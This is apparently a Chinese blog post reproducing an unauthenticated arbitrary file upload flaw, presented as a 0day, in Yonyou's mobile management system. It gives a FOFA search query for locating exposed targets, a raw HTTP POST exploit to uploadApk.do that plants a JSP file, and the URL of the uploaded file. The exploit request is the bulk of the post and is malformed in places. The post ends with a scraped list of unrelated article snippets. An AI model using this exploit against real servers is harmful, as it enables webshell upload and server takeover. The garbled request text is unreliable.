用友移动管理系统 任意文件上传漏洞复现(HW0day)
0x01 产品简介
用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。
0x02 漏洞概述
用友移动管理系统 uploadApk.do 接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。
0x03 复现环境
FOFA:app="用友-移动系统管理"
0x04 漏洞复现
PoC
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host: your-ip
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/mswordhello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
PS:返还状态码必须是2,其他状态码不行
验证url
http://your-ip/maupload/apk/a.jsp
0x05 修复建议
关闭互联网暴露面或设置接口访问权限
升级至安全版本
相关文章:
用友移动管理系统 任意文件上传漏洞复现(HW0day)
0x01 产品简介 用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。 0x02 漏洞概述 用友移动管理系统 uploa…...
启动springboot,出现Unable to start embedded Tomcat
报错信息 org.apache.catalina.core.ContainerBase : A child container failed during startjava.util.concurrent.ExecutionException: org.apache.catalina.LifecycleException: Failed to start component [StandardEngine[Tomcat].StandardHost[localhost].TomcatEmbedd…...
加密和安全
加密和安全 一.安全机制 安全攻击的几种典型方式: STRIDE Spoofing 假冒 Tampering 篡改 Repudiation 否认 Information Disclosure 信息泄漏 Denial of Service 拒绝服务 Elevation of Privilege 提升…...
Maven基础总结
前言 Maven 是一个项目管理工具,可以对 Java 项目进行构建、依赖管理。 基本要求掌握 配置Maven环境直接查。 得会在IDEA创建Maven的java项目吧、会创建Maven的web项目吧、会创建多模块项目吧。 得会配置插件pligin、依赖dependency吧 一、Maven四大特性 1、…...
Java 编程实战:如何用 Java 编写一个简单而强大的 Tomcat
学习完了JavaWeb,为了深入了解tomcat,打算手撕tomcat搭建自己的tomcat,希望对来访小伙伴也有帮助 引言 Tomcat 是一个开源的 Web 服务器和 Servlet 容器,它可以提供动态 Web 内容的处理和交互功能。Tomcat 是用 Java 语言编写的&a…...
【JavaSE】数组的定义与使用
详解数组 数组的基本概念什么是数组数组的创建及初始化数组的使用 数组是引用类型基本类型变量与引用类型变量的区别引用变量认识 null 数组的应用场景数组练习二维数组 数组的基本概念 什么是数组 数组可以看成是相同类型元素的一个集合。在内存中是一段连续的空间。比如现实…...
银河麒麟安装php7.1.33
银河麒麟V10兼容CentOS 8 安装过程与CentOS类似。 TencentOS3.1安装PHPNginxredis测试系统_乐大师的博客-CSDN博客 可以参考之前我写的文章。 不过有2个细节不同,下面说下。 问题1:编译错误提示“error:off_t undefined” 解决方法: 编…...
Kubernetes集群部署上篇(安装部署,但是集群网络未部署)
第四阶段 时 间:2023年8月9日 参加人:全班人员 内 容: Kubernetes集群部署上篇 目录 一、Kubernetes部署方式 (一)minikube (二)二进制包 (三)Kubeadm Kubea…...
跨境电商中的安全挑战与隐擎Fox指纹浏览器的应用
随着全球互联网的蓬勃发展,跨境电商已经成为了国际贸易的重要组成部分。然而,跨境电商的迅速崛起也伴随着一系列安全挑战,其中之一就是恶意活动和隐私泄露。为了应对这些挑战,诸多技术手段被开发出来,其中隐擎Fox指纹浏…...
10. Docker Swarm(一)
目录 1、前言 2、Docker Swarm体系架构 2.1、简单介绍 2.2、体系架构 3、简单使用 3.1、环境准备 3.2、初始化master节点 3.3、建立worker节点 3.4、查看集群的节点信息 3.5、部署应用 3.5.1、创建Dockerfile文件 3.5.2、构建镜像 3.5.3、将镜像上传到Docker仓库 …...
【MySQL】InnoDB存储引擎详解
InnoDB引擎是MySQL5.5版本之后默认的存储引擎 逻辑存储结构 首先是表空间Tablespace(ibd文件):一个mysql实力可以对应多个表空间,用于存储及记录,索引等数据 这些存储记录,索引等数据中是用段(Segment)来…...
组合求和-矩阵连乘所有加括号方式_2023_08_12
矩阵链加括号方式总数 前言 矩阵链乘积的瓶颈在于其标量运算的次数,不同的结合次序对其时间性能影响远大于矩阵乘积运算本身,可以看到许多教材上把求解矩阵标量运算的最优解作为动态规划的示例,问题隐含动态规划两大特征: 最优子…...
《3D 数学基础》12 几何图元
目录 1 表达图元的方法 1.1 隐式表示法 1.2 参数表示 1.3 直接表示 2. 直线和射线 2.1 射线的不同表示法 2.1.1 两点表示 2.1.2 参数表示 2.1.3 相互转换 2.2 直线的不同表示法 2.2.1 隐式表示法 2.2.2 斜截式 2.2.3 相互转换 3. 球 3.1 隐式表示 1 表达图元的方…...
【设计模式——学习笔记】23种设计模式——备忘录模式Memento(原理讲解+应用场景介绍+案例介绍+Java代码实现)
案例引入 游戏角色有攻击力和防御力,在大战Boss前保存自身的状态(攻击力和防御力),当大战Boss后攻击力和防御力下降,可以从备忘录对象恢复到大战前的状态 传统设计方案 针对每一种角色,设计一个类来存储该角色的状态 【分析】…...
致谢丨感谢有你,JumpServer开源项目九周年致谢名单
2014年到2023年,JumpServer开源项目已经走过了九年的时间。感谢以下社区贡献者对JumpServer项目的帮助和支持。 因为有你,一切才能成真。 JumpServer开源项目贡献者奖杯将于近日邮寄到以上贡献者手中,同时JumpServer开源项目组还准备了一份小…...
使用 Python 和 Flask 构建简单的 Restful API 第 1 部分
一、说明 我将把这个系列分成 3 或 4 篇文章。在本系列的最后,您将了解使用flask构建 restful API 是多么容易。在本文中,我们将设置环境并创建将显示“Hello World”的终结点。 我假设你的电脑上安装了python 2.7和pip。我已经在python 2.7上测试了本文…...
)
【深度学习所有损失函数】在 NumPy、TensorFlow 和 PyTorch 中实现(2/2)
一、说明 在本文中,讨论了深度学习中使用的所有常见损失函数,并在NumPy,PyTorch和TensorFlow中实现了它们。 (二-五)见 六、稀疏分类交叉熵损失 稀疏分类交叉熵损失类似于分类交叉熵损失,但在真实标签作为整数而不是独热编码提…...
Hazel 引擎学习笔记
目录 Hazel 引擎学习笔记学习方法思考引擎结构创建工程程序入口点日志系统Premake\MD没有 cpp 文件的项目会出错include 到某个库就要包含这个库的路径,注意头文件展开 事件系统 获取和利用派生类信息预编译头文件抽象窗口类和 GLFWgit submodule addpremake 脚本禁…...
Linux系统下Redis3.2集群
本节主要学习reids主从复制的概念,作用,缺点,流程,搭建,验证,reids哨兵模式的概念,作用,缺点,结构,搭建,验证等。 文章目录 一、redis主从复制 …...
Android图形-合成与显示-SurfaceTestDemo
目录 引言: 主程序代码: 结果呈现: 小结: 引言: 通过一个最简单的测试程序直观Android系统的native层Surface的渲染显示过程。 主程序代码: #include <cutils/memory.h> #include <utils/L…...
今天吃什么这个难题,我用YunYouJun cook来解决
文章目录每日一句正能量前言1. YunYouJun/cook:您的智能美食决策助手2.cook 使用指南与体验3.本地部署cook与运行4.使用 cpolar 将 cook 安全暴露到公网4.1 为什么要穿透 cook4.2 什么是 cpolar(内网穿透)?4.3 下载cpolar4.4注册及…...
Ink性能优化终极指南:10个技巧打造闪电般快速命令行应用
Ink性能优化终极指南:10个技巧打造闪电般快速命令行应用 【免费下载链接】ink 🌈 React for interactive command-line apps 项目地址: https://gitcode.com/GitHub_Trending/in/ink Ink是一个基于React的命令行应用开发框架,让开发者…...
别再只盯着Grad-CAM了!用OpenCV的applyColorMap函数,5分钟搞定PyTorch模型的特征图可视化
5分钟实现PyTorch特征图可视化:OpenCV高阶玩法全解析 在调试深度学习模型时,我们常常需要确认模型是否真正"看"到了图像的关键区域。传统方法如Grad-CAM虽然功能强大,但对于快速验证和日常调试来说,往往显得过于笨重。今…...
FPGA光模块调试翻车记:IBERT IP核的管脚约束,为什么我写的XDC总被覆盖?
FPGA光模块调试实战:破解IBERT IP核管脚约束冲突的底层逻辑 第一次在Vivado里看到"LOC constraint conflict"的红色报错时,我盯着IBERT生成的Example Design发呆了十分钟。明明在XDC文件里明确定义了SFP光模块的GTY收发器管脚,为什…...
【马斯克系 | AI版图】xAI合并SpaceX之后,紧接着是Cursor——1.25万亿美元之后,马斯克还在买什么
一、合并全景:1.25万亿美元背后的估值逻辑 从180亿到2500亿:18个月估值十倍跃迁 2024年5月,xAI的B轮融资在行业内引发过一轮讨论。 彼时距离这家公司成立才14个月,旗下核心产品Grok-1刚刚开源3140亿参数模型,市场评…...
从PyTorch到RV1126:手把手教你用RKNN-Toolkit Lite在嵌入式设备上部署YOLOv5
从PyTorch到RV1126:YOLOv5模型在Rockchip平台的终极部署指南 当YOLOv5遇上Rockchip RV1126,会擦出怎样的火花?作为嵌入式AI开发者,你一定遇到过这样的困境:在PC端训练好的高性能模型,到了资源受限的边缘设备…...
第三方检测机构必看:优检云LIMS如何满足CNAS、CMA合规要求?
检测机构的"合规红线"对于第三方检测机构来说,CNAS和CMA是两道绕不开的门槛。CMA(计量认证):国家强制要求,没有CMA出具的报告不具备法律效力CNAS(实验室认可):国际互认&am…...
ZXPInstaller:Adobe插件安装的完整免费解决方案
ZXPInstaller:Adobe插件安装的完整免费解决方案 【免费下载链接】ZXPInstaller Open Source ZXP Installer for Adobe Extensions 项目地址: https://gitcode.com/gh_mirrors/zx/ZXPInstaller 你是否曾为Adobe创意软件的.zxp插件安装感到困扰?当官…...
)
从实验室到产线:DCDC电源模块全流程测试实战(含高低温箱与N6705电源记录仪使用心得)
从实验室到产线:DCDC电源模块全流程测试实战指南 在硬件产品从研发走向量产的过程中,电源模块的可靠性往往决定着整机产品的成败。一款优秀的DCDC电源模块,不仅需要在实验室环境下表现出色,更要经受住产线批量生产和各种极端使用环…...
告别手动算地址!UVM验证中如何用uvm_mem_man实现C语言式的动态内存管理
UVM验证中的智能内存管理:用uvm_mem_man实现C语言式动态分配 在复杂SoC验证环境中,内存管理往往是验证工程师最头疼的问题之一。想象一下这样的场景:你需要为视频处理单元测试分配不同分辨率的帧缓冲区,同时还要为网络模块动态创建…...